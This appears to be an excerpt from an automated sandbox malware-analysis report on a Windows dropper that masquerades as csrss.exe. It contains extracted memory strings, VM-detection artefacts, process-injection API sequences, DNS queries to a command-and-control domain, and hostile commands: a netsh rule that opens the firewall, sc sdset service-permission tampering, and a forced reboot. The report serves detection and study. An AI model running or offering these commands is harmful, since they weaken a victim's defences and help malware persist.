Process]vgauthservice.exeSystemvgauthservice.exeRegistryvgauthservice.exesmss.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exefontdrvhost.exevgauthservice.exefontdrvhost.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exedwm.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeMemory Compressionmemory compressionvgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exevgauthservice.exevgauthservice.exeRuntimeBroker.exeruntimebroker.exevgauthservice.exebackgroundTaskHost.exebackgroundtaskhost.exevgauthservice.exef6oNLRKHUy.exevgauthservice.exeTrustedInstaller.exetrustedinstaller.exevgauthservice.exef6oNLRKHUy.exevgauthservice.exevmmemctlvmusbmouseMemory Compressionmemory compressionsmartscreen.exeShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSgrmBroker.exefiKKrsNZWTjxp.exefikk
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exesvchost.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exespoolsv.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exe
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: vmhgfs$
            Source: f6oNLRKHUy.exe, 00000003.00000002.372206194.00000000118D0000.00000004.00000001.sdmpBinary or memory string: [system process]vboxtray.exe
            Source: csrss.exeBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: sharedintapp.exesmss.exesharedintapp.execsrss.exesharedintapp.exewininit.exesharedintapp.execsrss.exesharedintapp.exeservices.exesharedintapp.exewinlogon.exesharedintapp.exelsass.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exedwm.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exespoolsv.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesihost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exectfmon.exesharedintapp.exeexplorer.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exedllhost.exesharedintapp.exesharedintapp.exeSearchUI.exesearchui.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.exeHxTsr.exehxtsr.exesharedintapp.exesharedintapp.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exedllhost.exesharedintapp.exeWmiPrvSE.exewmipr
vse.exesharedintapp.exesvchost.exesharedintapp.exesgrmbroker.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exeWmiPrvSE.exewmiprvse.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesharedintapp.exesvchost.exesharedintapp.execonhost.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exeUsoClient.exeusoclient.exesharedintapp.exesharedintapp.exedllhost.exesharedintapp.exesvchost.exesharedintapp.exesharedintapp.exesharedintapp.exef6onlrkhuy.exesharedintapp.exesharedintapp.exef6onlrkhuy.exesharedintapp.exe[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
            Source: f6oNLRKHUy.exe, 00000003.00000002.372349315.00000000118F6000.00000004.00000001.sdmpBinary or memory string: svchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesihost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exectfmon.exevmsrvc.exevmusrvc.exeexplorer.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeSearchUI.exesearchui.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeHxTsr.exehxtsr.exemvmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exedllhost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesgrmbroker.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exeWmiPrvSE.exewmiprvse.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exesvchost.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exevmsrvc.exevmusrvc.exe
            Source: f6oNLRKHUy.exe, 00000003.00000002.372398606.00000000118FE000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exeWmiPrvSE.exewmiprvse.exedllhost.exeWmiPrvSE.exewmiprvse.exesvchost.exesgrmbroker.exesvchost.exesvchost.exesvchost.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exedllhost.exesvchost.exef6onlrkhuy.exef6onlrkhuy.exexennet$
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: systemvmsrvc.exe
            Source: csrss.exeBinary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
            Source: csrss.exeBinary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use 
of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
            Source: csrss.exeBinary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
            Source: f6oNLRKHUy.exe, 00000003.00000002.371702549.0000000011852000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exeWmiPrvSE.exewmiprvse.exedllhost.exeWmiPrvSE.exewmiprvse.exesvchost.exesgrmbroker.exesvchost.exesvchost.exesvchost.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.execonhost.exevmxnetvmx86$
            Source: f6oNLRKHUy.exe, 00000001.00000002.358486329.0000000000401000.00000040.00020000.sdmp, f6oNLRKHUy.exe, 00000003.00000002.367326262.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000008.00000002.621585860.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000014.00000002.388770510.0000000000401000.00000040.00020000.sdmp, csrss.exe, 00000018.00000002.401992805.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001B.00000002.402857398.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: svchost.exe, 0000001D.00000002.621997919.0000029C4C028000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: csrss.exeBinary or memory string: EndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*
            Source: csrss.exeBinary or memory string: llocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't
            Source: csrss.exe, 0000001F.00000002.422012324.0000000000401000.00000040.00020000.sdmpBinary or memory string: l}main.isRunningInsideVMWare
            Source: csrss.exeBinary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
            Source: windefender.exe, 00000025.00000002.433836098.0000000000B0A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A009E1D4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00B9D3C GetProcessHeap,34_2_00007FF6A00B9D3C
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process token adjusted: Debug
            Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009D8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,34_2_00007FF6A009D8BC
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A009E1D4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009E37C SetUnhandledExceptionFilter,34_2_00007FF6A009E37C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00A543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF6A00A543C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009DE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00007FF6A009DE24

            HIPS / PFW / Operating System Protection Evasion:

            Contains functionality to inject threads in other processes
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00927F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,34_2_00007FF6A00927F0
            Performs DNS TXT record lookups
            Source: Traffic DNS traffic detected: queries for: trumops.com
            Source: Traffic DNS traffic detected: queries for: logs.trumops.com
            Source: Traffic DNS traffic detected: queries for: 8cf49c60-c834-48e4-bacd-9cc30e6a4460.uuid.trumops.com
            Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
            Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
            Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
            Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
            Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progman
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmp Binary or memory string: &Program Manager
            Source: csrss.exe, 00000008.00000002.633094624.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progmanlock
            Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
            Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,34_2_00007FF6A00B9A24
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,34_2_00007FF6A00B0A8C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,34_2_00007FF6A00B933C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,34_2_00007FF6A00B940C
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,34_2_00007FF6A00B94A4
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,34_2_00007FF6A00B96F0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: try_get_function,GetLocaleInfoW,34_2_00007FF6A00B0FD0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,34_2_00007FF6A00B8FF0
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,34_2_00007FF6A00B9848
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,34_2_00007FF6A00B98F8
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A00B5140 cpuid 34_2_00007FF6A00B5140
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 34_2_00007FF6A009E0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00007FF6A009E0C8

            Lowering of HIPS / PFW / Operating System Security Settings:

            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
            Modifies the windows firewall
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
            Source: C:\Users\user\Desktop\f6oNLRKHUy.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Remote Access Functionality:

            Yara detected Metasploit Payload
            Source: Yara match File source: 31.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.f6oNLRKHUy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.f6oNLRKHUy.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 8.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 20.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 16.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 27.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 38.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 24.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, type: MEMORY
